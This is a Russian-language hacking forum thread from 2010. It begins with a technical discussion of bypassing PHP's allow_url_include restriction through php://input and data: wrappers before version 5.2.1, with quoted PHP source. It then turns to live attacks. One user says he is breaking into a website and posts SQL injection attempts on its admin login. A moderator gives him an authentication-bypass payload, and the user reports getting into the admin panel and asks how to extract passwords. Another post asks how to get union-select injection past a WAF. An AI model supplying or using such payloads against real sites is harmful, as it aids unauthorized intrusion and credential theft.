ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.03.2010, 21:45
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Root-access
Откуда такая категоричность? Всё зависит от версии, на каких-то версиях можно легко заинклудить удалённый файл при allow_url_include=Off.
Универсального PoC у меня нет.
От версии чего это зависит?
И пример желательно
PS Только не тот который в РОА, пожалуйста, а что-нибудь своё
|
|
|
14.03.2010, 21:48
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Jokester
От версии чего это зависит?
И пример желательно
От версии php. Можем проверить вместе - нужен сервак с ?< версией php <5.2.1.
Вот смотри: http://bugs.php.net/bug.php?id=35618
[2006-12-12 20:58 UTC] judas dot iscariote at gmail dot com
Make sure to clearly mention that in 5.2.1 it affects php://input among other wrappers.  Стало быть, до этой версии инклуд php://input не запрещён => имеем обход ограничений.
|
|
|
|
14.03.2010, 22:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Угу, сейчас потестил на 5.2.0-8+etch16, работает и php://input и data
Это конечно не RFI, который я имел ввиду, но всё равно интересно
|
|
|
|
14.03.2010, 22:35
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Вот, я кажется откопал место в исходниках php, где это видно.
Вот участок в memory.c в 5.2.0:
Код:
708 php_stream_wrapper php_stream_rfc2397_wrapper = {
709 &php_stream_rfc2397_wops,
710 NULL,
711 0, /* is_url */
712 };
А вот тот же участок в 5.2.1:
Код:
745 php_stream_wrapper php_stream_rfc2397_wrapper = {
746 &php_stream_rfc2397_wops,
747 NULL,
748 1, /* is_url */
749 };
А теперь смотрим в исходник streams.c (там нижеследующий код одинаков вроде бы во всех версиях):
Код:
1605 if ((wrapperpp && (*wrapperpp)->is_url) && (!PG(allow_url_fopen) || ((options & STREAM_OPEN_FOR_INCLUDE) && !PG(allow_url_include))) ) {
1606 if (options & REPORT_ERRORS) {
1607 php_error_docref(NULL TSRMLS_CC, E_WARNING, "URL file-access is disabled in the server configuration");
1608 }
1609 return NULL;
1610 }
Вот как-то так. Значит в версиях до 5.2.1 RFI будет и с allow_url_include=Off, если использовать php-streams типа php://input. Для data: видимо тоже есть где-то такое определение (насчёт того, is_url он или нет).
Нижнюю границу версий точно не знаю...
Последний раз редактировалось Root-access; 14.03.2010 в 22:39..
|
|
|
|
14.03.2010, 22:44
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Root-access
Вот как-то так. Значит в версиях до 5.2.1 RFI будет и с allow_url_include=Off.
RFI там не будет. Только обёртки отработают
|
|
|
|
14.03.2010, 23:08
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Ну ок ок, не RFI, а CE - нам от этого нисколько не хуже.)
Хотя вопрос был принципиальный - возможна ли эксплуатация RFI в таких условиях. Видимо ответ конкретно на этот вопрос - всё-таки нет...
|
|
|
|
15.03.2010, 08:03
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
а если при инекции есть такоы ошибка
+union+select+0 i vot osibka..
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
и зделал /*!sql*/ (WАF) НЕ помоq..
|
|
|
|
15.03.2010, 10:34
|
|
Познающий
Регистрация: 14.05.2009
Сообщений: 92
Провел на форуме:
299447
Репутация:
5
|
|
Всем доброго времени суток!
Помогите если не сложно.
Ломаю сайт не зная как 
Нашёл на сайте форму для входа админа, в ней есть баг.
Вот форма :
В поле e-mail ввожу ковычку вылетает такая ошибка:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''' AND PASSWORD =''
В поле E-mail пишу следующее:
'union+select+from+admin_users+limit+19,1%23
Вылетает это:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+select+from+admin_users+limit+19,1%23' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''union+select+from+admin_users+limit+19, 1%23' AND PASSWORD =''
В чём моя ошибка? Сильно не пинайте если натупил =)
Я только учусь)
и если не сложно дайте код правильного запроса.
Заранее спасибо ! =) |
|
|
|
15.03.2010, 10:39
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
В поле email вбей, admin' or '1'='1' --
|
|
|
|
15.03.2010, 10:49
|
|
Познающий
Регистрация: 14.05.2009
Сообщений: 92
Провел на форуме:
299447
Репутация:
5
|
|
Выдаёт вот такую ошибку
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME='admin' or '1'='1' --' AND PASSWORD =''
Всё получилось ))) Спасибо лови от меня +
Вот как надо было admin' or '1'='1' -- and password
И можно описание данного кода?
именно вот этого куска: admin' or '1'='1' --
Ладно в админку то я попал.. но это было не особо гланым...
Как вытащить пароль из базы?
Заранее спасибо)
Последний раз редактировалось iGlass; 15.03.2010 в 10:55..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
